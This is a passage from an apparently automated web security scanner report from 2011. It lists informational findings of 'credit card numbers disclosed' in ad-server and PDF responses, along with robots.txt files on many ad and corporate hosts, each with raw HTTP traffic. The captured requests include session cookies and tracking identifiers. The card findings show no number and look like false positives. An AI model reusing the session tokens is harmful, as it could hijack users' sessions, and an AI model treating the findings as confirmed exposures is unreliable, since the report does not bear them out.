0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D\x22\x3e\x3c/script\x3e\x3c/body\x3e\x3c/html\x3e';addAdSenseContent(window, 5951, adsense_content_5951);renderAdSense(window, document, 5951, 300, 250, true);

27.2. http://ib.adnxs.com/ab  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following credit card number was disclosed in the response:

Request

GET /ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j^mpJE<$kSEt*JykUZhXB8XJ0oede![)AEsIM^tT@?LGc[=4bz:`?WTNk8atX?)M4!*Z#:qn:#h

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...
0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D\";\n//-->
...[SNIP]...

27.3. http://www.kronos.com/email/c/agendalcc11-full.pdf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /email/c/agendalcc11-full.pdf

Issue detail

The following credit card number was disclosed in the response:

Request

GET /email/c/agendalcc11-full.pdf HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/email/c/agendalcc11-full.pdf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; fcspersistslider1=5; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.10.10.1303738437
Range: bytes=32768-284279
If-Range: Thu, 14 Apr 2011 19:48:09 GMT

Response

HTTP/1.1 206 Partial Content
Cache-Control: max-age=432000
Content-Length: 251512
Content-Type: application/pdf
Content-Location: http://www.kronos.com/email/c/agendalcc11-full.pdf
Content-Range: bytes 32768-284279/284280
Last-Modified: Thu, 14 Apr 2011 19:48:09 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:22:26 GMT

6w.Sn|.c^...[...P.xn.m".>*.6(.Ef.H]...X....'.....]..,-/PSQ.XA....l....a.i.._V.....LZ7y...aK.......w... &.........-QGKF{s.Op...$.;p....)..q^.1.B2:...?8u.....|3e.:_..~...w...k...^.h..4.n*..8..\}S
.|.
...[SNIP]...
< /Type /FontDescriptor /Ascent 952 /CapHeight 644 /Descent -269 /Flags 4
/FontBBox [-476 -194 1214 952] /FontName /SDJQOU+Calibri /ItalicAngle 0 /StemV
0 /AvgWidth 503 /MaxWidth 1288 /XHeight 476 /FontFile2 32 0 R >
...[SNIP]...
< /Type /FontDescriptor /Ascent 952 /CapHeight 644 /Descent -269 /Flags 68
/FontBBox [-476 -194 1214 952] /FontName /EGZQJU+Calibri-Italic /ItalicAngle
-5 /StemV 0 /AvgWidth 502 /MaxWidth 1288 /XHeight 476 /FontFile2 38 0 R >
...[SNIP]...

28. Robots.txt file  previous  next
There are 60 instances of this issue:


28.1. http://945075.r.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://945075.r.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 945075.r.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2147483647
Content-Type: text/plain
Last-Modified: Tue, 15 Sep 2009 18:04:58 GMT
Accept-Ranges: bytes
ETag: "455b9d92f36ca1:0"
Server: Microsoft-IIS/7.5
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
Date: Mon, 25 Apr 2011 12:12:16 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

28.2. http://ad.afy11.net/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 06 Jul 2007 06:09:38 GMT
Accept-Ranges: bytes
ETag: "78f7133c94bfc71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 30

User-agent: *
Disallow: /


28.3. http://ad.doubleclick.net/adj/lj.homepage/loggedout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/lj.homepage/loggedout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

28.4. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.31.118
Connection: close
Content-Length: 24

User-agent: *
Disallow:

28.5. http://apnxscm.ac3.msn.com:81/CACMSH.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apnxscm.ac3.msn.com:81
Path:   /CACMSH.ashx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: apnxscm.ac3.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:36:35 GMT
Last-Modified: Sat, 02 Apr 2011 00:47:24 GMT
Accept-Ranges: bytes
ETag: "1CBF0CF87F3F600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Mon, 25 Apr 2011 14:36:34 GMT
Connection: close
Content-Length: 70

# Keep all robots out of entire web site
User-agent: *
Disallow: /

28.6. http://b.voicefive.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

28.7. http://b2bcontext.ru/services/advertisement/getblock  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b2bcontext.ru
Path:   /services/advertisement/getblock

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b2bcontext.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:47:21 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 26 Jul 2010 15:06:23 GMT
ETag: "5960d7-2d-48c4bba4eb9c0"
Accept-Ranges: bytes
Content-Length: 45
Vary: Accept-Encoding

User-agent: *
Disallow:
Host: b2bcontext.ru

28.8. http://beacon.securestudies.com/scripts/beacon.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /scripts/beacon.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

28.9. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:29:06 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 25 Apr 2011 15:29:06 GMT
Content-Length: 26
Connection: close

User-Agent: *
Disallow: /

28.10. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.yandex.ru
Path:   /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: text/plain; charset=UTF-8
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 26
Connection: close

User-Agent: *
Disallow: /

28.11. https://checkout.netsuite.com/robots.txt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /robots.txt

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Cookie: JSESSIONID=dr9LN1Gcsnv0hQn9pSF9dZtY69V5GT6wWLx5pbn5zqyTN5K0By5hSnyCLpkp16zsn8jTQzcvVTNZSwMD4mG6WZmpmLChGK6FncvhBpQv6KGffqpM2fHyGlYVz2GpQM2Y!-979559123; NLVisitorId=rcHW8495AYoCDqLY; NLShopperId=rcHW8495AXICDie_; NS_VER=2011.1.0
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:26:41 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 103
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: -1592275309:616363742D6A6176613032302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

28.12. http://clients1.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:08:24 GMT
Expires: Mon, 25 Apr 2011 12:08:24 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.13. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1696648009
Date: Mon, 25 Apr 2011 15:14:04 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

28.14. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: direct.yandex.ru

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:59 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Vary: Host
Set-Cookie: yandexuid=710800411303742159; path=/; expires=Thu, 22-Apr-21 14:35:59 GMT; domain=.yandex.ru
Last-Modified: Mon, 09 Aug 2010 08:46:53 GMT
ETag: "2a26c4-1c3-4c5fc07d"
Accept-Ranges: bytes
Content-Length: 451

User-Agent: *
Disallow: /registered/
Disallow: /popupdisabledIps.html?disabledIps=
Disallow: /servicing?thanks=1
Disallow: /?add-half
Disallow: /?top
Disallow: /?mail
Disallow: /?hnt=
Disallow: /catal
...[SNIP]...

28.15. http://forums.manageengine.com/fbw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums.manageengine.com

Response

HTTP/1.1 200 OK
Set-Cookie: zdccn=fcab3ada-01e9-4127-bcca-5e8767e2ef21; Path=/
Set-Cookie: JSESSIONID=C454637E3F29ACCC6DE97FF79C18152E; Path=/
ETag: W/"263-1303448978000"
Last-Modified: Fri, 22 Apr 2011 05:09:38 GMT
Content-Type: text/plain;charset=UTF-8
Content-Length: 263
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache-Coyote/1.1
Connection: close

# ------------------------------------------
# Zoho -- http://discussions.zoho.com
# Robot Exclusion File -- robots.txt
# Author: Rajaram.I
# Last Updated: 05/10/09
# -------------------------------
...[SNIP]...

28.16. http://games.mochiads.com/c/g/moon-volley/mvolley.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.mochiads.com
Path:   /c/g/moon-volley/mvolley.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: games.mochiads.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
Content-Length: 23
Last-Modified: Thu, 21 Oct 2010 04:40:53 GMT
P3P: policyref="http://www.mochimedia.com/p3p/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Permitted-Cross-Domain-Policies: master-only
User-Header: X-Permitted-Cross-Domain-Policies: master-only
X-MochiAds-Server: 38.102.129.21:80
Accept-Ranges: bytes
X-Mochi-Backend: 10.0.0.107:40049
X-Mochi-Source: 10.0.0.236:44381
Date: Mon, 25 Apr 2011 14:45:26 GMT
Connection: close

User-agent: *
Allow: /

28.17. http://goods.adnectar.com/analytics/get_avia_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods.adnectar.com
Path:   /analytics/get_avia_js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: goods.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:30:25 GMT
Content-Type: text/plain
Content-Length: 204
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hYFNKXjmCLwiAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

28.18. http://goods43.adnectar.com/analytics/record_impression  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://goods43.adnectar.com
Path:   /analytics/record_impression

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: goods43.adnectar.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.2
Date: Mon, 25 Apr 2011 14:31:30 GMT
Content-Type: text/plain
Content-Length: 204
Last-Modified: Fri, 22 Apr 2011 00:28:46 GMT
Connection: close
Set-Cookie: adnectar_id=PObkQ021hcJNKXjmCL4vAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=adnectar.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI ADM DEV PSAi COM NAV OUR STP IND DEM"
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

28.19. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 25 Apr 2011 12:06:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

28.20. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ideco-software.ru

Response

HTTP/1.1 200 OK
Content-Length: 58
Content-Type: text/plain
Last-Modified: Tue, 11 Nov 2008 09:18:17 GMT
Accept-Ranges: bytes
ETag: "74a2ab6ede43c91:fcf"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:36:04 GMT
Connection: close

User-agent: *
Disallow:


Host: www.ideco-software.ru

28.21. http://imagesrv.gartner.com/cio/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /cio/css/main.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Content-type: text/plain
Last-modified: Tue, 17 Nov 2009 16:20:54 GMT
Date: Mon, 25 Apr 2011 12:11:16 GMT
Content-Length: 28
ETag: "pvacd973686270d8ac5ed7002c7dba1bf2"
Expires: Wed, 27 Apr 2011 12:11:16 GMT
Age: 1
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10232.C10821.A150986.RA0.G24F27.U2A1BF8DA].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=15658f72d9195ca7a9904bc69fbdb85aec79908c2a0961ae4db564e4; Path=/

User-agent: *
Disallow: /

28.22. http://img.en25.com/Web/KronosIncorporated/kronos-ga.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.en25.com
Path:   /Web/KronosIncorporated/kronos-ga.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.en25.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Content-Length: 44
Cache-Control: max-age=0
Date: Mon, 25 Apr 2011 14:54:46 GMT
Connection: close

# do not index
User-agent: *
Disallow: /

28.23. http://map.media6degrees.com/orbserv/aopix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/aopix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 25 Apr 2011 14:37:39 GMT
Connection: close

# go away
User-agent: *
Disallow: /

28.24. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Mon, 25 Apr 2011 12:13:59 GMT
Expires: Mon, 25 Apr 2011 12:13:59 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

28.25. http://mbox5.offermatica.com/m2/netsuite/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mbox5.offermatica.com
Path:   /m2/netsuite/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mbox5.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"25-1284655556000"
Accept-Ranges: bytes
Content-Length: 25
Date: Mon, 25 Apr 2011 15:13:56 GMT
Connection: close
